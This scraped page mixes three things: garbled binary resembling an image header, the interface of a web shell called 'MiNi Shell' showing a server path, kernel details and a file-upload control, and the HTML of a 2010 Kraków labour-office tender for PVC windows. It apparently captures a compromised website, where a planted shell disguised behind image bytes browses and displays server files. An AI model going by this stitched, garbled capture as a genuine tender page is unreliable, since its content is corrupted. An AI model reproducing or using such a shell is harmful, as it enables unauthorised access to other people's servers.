JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100907/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100907/243745-N-2010.html

<p class="kh_header"><b>Kraków: Zamówienie Nr: OZ-JW-271-323/III/2010 z dnia  03.09.2010 r.
Dostawa i montaż okien PVC w pomieszczeniach  Grodzkiego Urzędu Pracy w Krakowie</b><br>
<b>Numer ogłoszenia: 243745 - 2010; data zamieszczenia: 07.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Grodzki Urząd Pracy w Krakowie , ul. Wąwozowa 34, 31-752 Kraków, woj. małopolskie, tel. 012 6855060, faks 012 6451270.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gupkrakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zamówienie Nr: OZ-JW-271-323/III/2010 z dnia  03.09.2010 r.
Dostawa i montaż okien PVC w pomieszczeniach  Grodzkiego Urzędu Pracy w Krakowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest: Wykonanie, dostawa i montaż  okien rozwieralno-uchylnych z tworzywa PVC wraz z zewnętrznymi parapetami w pomieszczeniach Grodzkiego Urzędu Pracy w Krakowie przy ul. Wąwozowej 34.

2.	Wykonawca zobowiązuje się do dostarczenia  i montażu przedmiotu zamówienia w pomieszczeniach wskazanych przez Zamawiającego zgodnie z zakresem rzeczowym   robót przedstawionym w Przedmiarze Robót stanowiącym Załącznik Nr 1 do SIWZ oraz zestawieniem ilościowo-jakościowym przestawionym w Specyfikacji Technicznej stanowiącej Załącznik Nr 2 do  SIWZ.

3.	W Przedmiarze Robót i w Specyfikacji Technicznej stanowiącej Załączniki Nr 1 i Nr 2 do SIWZ  Zamawiający  podał  wykaz  pomieszczeń, w których montowane będą okna  i parapety zewnętrzne. 
4.	Zamawiający dopuszcza składanie ofert równoważnych zgodnie z postanowieniami ustawy p.z.p., w której Wykonawca jest zobowiązany do wykazania w jej treści, że oferowany przedmiot zamówienia gwarantuje zachowanie  takich samych lub lepszych parametrów technicznych, eksploatacyjnych, jakościowych, funkcjonalnych oraz użytkowych. 
W takim przypadku, Wykonawca  zobowiązany  jest przedstawić wraz z ofertą jego szczegółową specyfikację, z której w sposób nie budzący żadnej wątpliwości Zamawiającego winno wynikać, iż oferowany przedmiot zamówienia jest o takich samych lub lepszych parametrach technicznych, eksploatacyjnych, jakościowych, funkcjonalnych oraz użytkowych w odniesieniu do przedmiotu zamówienia określonego przez Zamawiającego.

5.	Przedmiot zamówienia wykonywany będzie z materiałów własnych Wykonawcy.  

6.	Wykonawca zobowiązany  jest dołączyć do oferty wszelkie  gwarancje producenta wyrobu, certyfikaty bezpieczeństwa, aprobaty techniczne, deklaracje lub certyfikaty zgodności oraz instrukcje montażu  i kartę techniczną okien.
  
7.	W Specyfikacji Technicznej stanowiącej Załącznik Nr 2 do SIWZ podane zostały przybliżone wymiary okien PCV dla potrzeb obliczenia ceny oferty. Przed przystąpieniem do ich wykonania Wykonawca, któremu zostanie udzielone zamówienie, winien dokonać szczegółowych pomiarów okien. 

8.	Zamawiający zaleca Wykonawcom przeprowadzenie  wizji lokalnej na terenie objętym zamówieniem w celu szczegółowego zapoznania się ze specyfiką i charakterem prac a także zdobycie na swoja własną odpowiedzialność i ryzyko wszelkich dodatkowych informacji, które mogą być konieczne  do przygotowania oferty oraz zawarcia umowy i wykonania zamówienia. Zamawiający nie będzie respektował żadnych zarzutów wynikających z nieznajomości przez Wykonawców specyfiki i charakteru prac, jeżeli okoliczności te możliwe były do ustalenia przy przeprowadzonej z należytą starannością wizji lokalnej. Koszty dokonania wizji lokalnej terenu prac ponosi Wykonawca.

UWAGA:

a)	Użyte do wykonania zamówienia materiały winny być zgodne  z wymaganiami polskich norm, atestów, aprobat technicznych, gwarancji, posiadać certyfikaty bezpieczeństwa oraz odpowiednie deklaracje lub certyfikaty zgodności. Przedmiot zamówienia musi odpowiadać wymaganiom zawartym w normach państwowych lub świadectwach ITB dopuszczających dany wyrób do obrotu i stosowania w budownictwie - zgodnie z wymogami jakości  określonymi w  art. 10 Ustawy - Prawo budowlane.
b)	Dostawa i montaż przedmiotu zamówienia winny być wykonane zgodnie z warunkami wynikającymi z przepisów technicznych, bezpieczeństwa pracy i przeciwpożarowych oraz z zasadami wiedzy technicznej.
c)	Służby wewnętrzne Urzędu pracują od poniedziałku do piątku w godzinach od 7.30 do 15.30. Zamawiający udostępni  pomieszczenia wymienione   w Przedmiarze robót  i Specyfikacji Technicznej przez 7 dni w tygodniu w tym również po godzinach pracy Urzędu oraz w dniach w których Urząd nie przyjmuje stron.
d)	Prace powodujące  natężenie hałasu powinny być realizowane po godz. 15.00 lub w dniach w których Urząd nie pracuje.

9.	Wymagania stawiane Wykonawcy:
a)	Wykonawca określi termin rozpoczęcia prac z 2-dniowym wyprzedzeniem.
b)	Wykonawca  dostarczy przedmiot zamówienia  do siedziby Zamawiającego własnym transportem i na własny koszt. Zamówione okna zostaną przez Wykonawcę wniesione do wskazanych pomieszczeń, rozpakowane i  zmontowane. 
c)	Po zakończeniu montażu Wykonawca zobowiązuje się zabrać na własny koszt zdemontowane stare okna drewniane i odwóz ich na legalne składowisko oraz zbędne materiały i opakowania transportowe od dostarczonych okien.
d)	Wykonawca  jest odpowiedzialny za całokształt, w tym za przebieg oraz terminowe wykonanie przedmiotu zamówienia.
e)	Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi określonymi dla przedmiotu zamówienia.  
f)	Od Wykonawcy wymagana jest należyta staranność przy realizacji zamówienia, rozumiana jako staranność profesjonalisty w działalności objętej przedmiotem niniejszego zamówienia,
g)	ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez Zamawiającego z ustanowionym przedstawicielem Wykonawcy,
h)	inne wymagania określone we wzorze umowy oraz wynikające z przepisów prawa.

10.	Szczegółowy opis przedmiotu zamówienia zawierają Załączniki Nr 1 - Przedmiar Robót  i Nr 2 - Specyfikacja Techniczna do SIWZ.

11.	Wymagany  okres gwarancji  na przedmiot zamówienia wynosi minimum 60 miesięcy, licząc od dnia podpisania przez Zamawiającego protokołu odbioru końcowego przedmiotu umowy. Okresy gwarancji udzielane przez Podwykonawców muszą odpowiadać co najmniej okresowi gwarancji udzielonemu przez Wykonawcę.

12.	Zamawiający dopuszcza możliwość powierzenia przez Wykonawcę wykonania części lub całości  zamówienia Podwykonawcom. W formularzu ofertowym (stanowiącym Załącznik Nr 3 do SIWZ) Wykonawca poda wykaz części zamówienia, których wykonanie powierzy Podwykonawcom.

13.	Termin realizacji zamówienia:   4 tygodnie od  dnia podpisania umowy.

14.	Miejsce  realizacji  zamówienia: Grodzki  Urząd  Pracy  w  Krakowie, 31-752 Kraków, ul. Wąwozowa 34..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 44.22.11.00-6, 45.42.11.32-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 28.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona  na potrzeby wykonania przedmiotu zamówienia  nie wymaga posiadania specjalnych uprawnień. 
Dla uznania, że Wykonawca spełnia ten warunek, Zamawiający wymaga od Wykonawcy złożenia oświadczenia, że na dzień składania ofert   spełnia warunki udziału w postępowaniu określone w art. 22 ust. 1 Ustawy p.z.p. - wg załącznika Nr 4A lub 4B do SIWZ.  Zamawiający oceni spełnienie tego warunku na zasadzie spełnia - nie spełnia  na podstawie złożonego  do oferty w/w  oświadczenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy    powinni    udokumentować    posiadanie    wiedzy    i  doświadczenia   poprzez wykazanie wykonanych a w przypadku świadczeń okresowych lub ciągłych również wykonywanych dostaw   w okresie ostatnich  trzech  lat, przed upływem terminu składania ofert,  a  jeżeli  okres  prowadzenia  działalności  jest  krótszy - w  tym  okresie,   z   podaniem   ich wartości, przedmiotu, dat wykonania i odbiorców, w tym co najmniej 2 dostaw  odpowiadających swoim rodzajem dostawom stanowiącym przedmiot zamówienia, o wartości nie mniejszej niż 30.000,00 zł brutto każda oraz załączyć dokumenty (np. referencje) potwierdzające, że te dostawy   zostały wykonane lub są wykonywane należycie.
Sprawdzenie spełnienia tego warunku zostanie dokonane na podstawie wykazu załączonego do oferty na zasadzie: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku: 
Zamawiający nie  wyznacza szczegółowego warunku w tym zakresie. 
Dla uznania, że Wykonawca spełnia ten warunek, Zamawiający wymaga od Wykonawcy złożenia oświadczenia, że na dzień składania ofert   spełnia warunki udziału w postępowaniu określone w art. 22 ust. 1 Ustawy p.z.p. - wg załącznika Nr 4A lub 4B do SIWZ.  Zamawiający oceni spełnienie tego warunku na zasadzie spełnia - nie spełnia  na podstawie złożonego  do oferty w/w  oświadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Dla uznania, że Wykonawca spełnia ten warunek, Zamawiający wymaga od Wykonawcy złożenia oświadczenia, że na dzień składania ofert   spełnia warunki udziału w postępowaniu określone w art. 22 ust. 1 Ustawy p.z.p. - wg załącznika Nr 4A lub 4B do SIWZ.  Zamawiający oceni spełnienie tego warunku na zasadzie spełnia - nie spełnia  na podstawie złożonego  do oferty w/w  oświadczenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Dla uznania, że Wykonawca spełnia ten warunek, Zamawiający wymaga od Wykonawcy złożenia oświadczenia, że na dzień składania ofert   spełnia warunki udziału w postępowaniu określone w art. 22 ust. 1 Ustawy p.z.p. - wg załącznika Nr 4A lub 4B do SIWZ.  Zamawiający oceni spełnienie tego warunku na zasadzie spełnia - nie spełnia  na podstawie złożonego  do oferty w/w  oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu albo do reprezentowania w postępowaniu i do zawarcia umowy, jeżeli Wykonawca jest reprezentowany niezgodnie z zapisem we właściwym rejestrze, zaświadczeniu o wpisie do ewidencji działalności gospodarczej lub innym dokumencie, właściwym dla formy organizacyjnej.
2.	Kosztorys ofertowy z cenami jednostkowymi i wartością dostawy stanowiącą całkowitą cenę zamówienia sporządzony w oparciu o  załączony Przedmiar Robót i Specyfikację Techniczną  stanowiące Załączniki Nr 1 i Nr 2 do SIWZ. 
3.	oświadczenie, że nie zalega z opłacaniem podatków, opłat oraz składek ZUS na ubezpieczenie zdrowotne i społeczne lub oświadczenie,  że uzyskał prawem przewidziane  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego  organu (Urzędu Skarbowego, ZUS, KRUS),
4.	oświadczenie o niekaralności  w zakresie określonym w art. 24 ust. 1 pkt. 4-8 Ustawy p.z.p.  I w zakresie określonym w art. 24 ust. 1 pkt. 9 Ustawy p.z.p.
5.	oświadczenie Wykonawcy, że oferowany przedmiot zamówienia  spełnia wymagania zawarte w obowiązujących  w tym zakresie przepisach prawnych (wg wzoru stanowiącego Załącznik Nr 7 do SIWZ),
6.	dokumenty, tj. gwarancje producenta wyrobu,  certyfikaty bezpieczeństwa, aprobaty techniczne, deklaracje lub certyfikaty zgodności oraz kartę techniczną okna i instrukcję montażu.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gupkrakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 31-752 Kraków, ul. Wąwozowa 34, pok. 216 od poniedziałku do piątku  w godz. 900 do  1430  lub pocztą po pisemnym zamówieniu przesłanym listownie lub faksem..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.09.2010 godzina 10:00, miejsce: Siedziba Zamawiającego- 31-752 Kraków, ul. Wąwozowa 34, pok. 119 (dziennik podawczy).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com